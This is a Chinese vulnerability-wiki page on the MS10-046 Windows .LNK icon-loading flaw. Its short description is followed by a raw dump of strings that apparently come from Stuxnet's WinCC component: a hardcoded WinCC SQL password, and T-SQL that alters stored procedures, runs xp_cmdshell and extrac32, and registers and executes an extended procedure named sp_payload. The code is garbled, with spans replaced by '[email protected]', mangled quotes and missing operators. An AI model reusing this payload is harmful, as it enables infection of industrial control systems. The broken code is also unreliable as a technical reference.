用户工具

站点工具


ms_漏洞库:ms10-046

Windows快捷方式*.LNK文件自动执行文件漏洞

微软于2010年8月发布了MS10-046漏洞修复补丁,实际该补丁无效,微软于MS15-020重新修复了该漏洞。

原理分析

Windows系统在显示快捷方式文件(.lnk)时,会根据文件的结构信息寻找所需的图标资源,之后系统会将图标展现给用户,如果图标资源在DLL文件中,系统就会加载这个DLL文件。
如果为这个dll构造恶意代码就会导系统不运行文件即可执行恶意代码

xx.lnk
SOFTWARE\Microsoft\MSSQLServer
pdl
GracS\
2WSXcder
WinCCConnect
master
.\WinCC
sqloledb
GracS\cc_tlg7.sav
Step7\Example
use [%s]
declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where id=object_id(N’[dbo].[MCPVREADVARPERCON]‘)) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N’[dbo].[MCPVREADVARPERCON]‘) set @e=charindex(‘,openrowset’,@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex(‘sp_msforeachdb’,@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t=’alter ‘[email protected]+’,openrowset(”SQLOLEDB”,”Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder”,”select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=””use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=””””–CC-S””””+char(80);if left(db_name(),2)=””””CC”””” select @t=substring(text,charindex(@s,text)+8,charindex(””””–*””””,text)-charindex(@s,text)-8) from syscomments where text like (””””%””””[email protected]+””””%””””);if @t is not NULL exec(@t)””;exec sp_msforeachdb @z”)’ exec (@t)
declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where id=object_id(N’[dbo].[MCPVPROJECT2]‘)) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N’[dbo].[MCPVPROJECT2]‘) order by c.number, c.colid set @e=charindex(‘–CC-SP’,@t) if @e=0 begin set @f=charindex(‘where’,@t) if @f0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t=’alter ‘[email protected]+’ where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=”1”) –CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ”CC%”) open r fetch next from r into @t while (@@fetch_status-1) begin set @t=left(@t,len(@t)-charindex(”\”,reverse(@t)))+”\GraCS\cc_tlg7.sav”;exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ”master..xp_cmdshell ””extrac32 /y “”[email protected]+”” “”[email protected]+”x””””;exec(@s);set @t = @t+”x”;dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end close r deallocate r –*’ exec (@t)
use master
select name from master..sysdatabases where filename like N’%s’
exec master..sp_attach_db ‘wincc_svr’,N’%s’,N’%s’
exec master..sp_detach_db ‘wincc_svr’
use wincc_svr

评论

xmd5, 2017/07/20 09:49

重新修复了改漏洞 该漏洞

你需要登录发表评论。
ms_漏洞库/ms10-046 · 最后更改: 2017/09/10 10:18

页面工具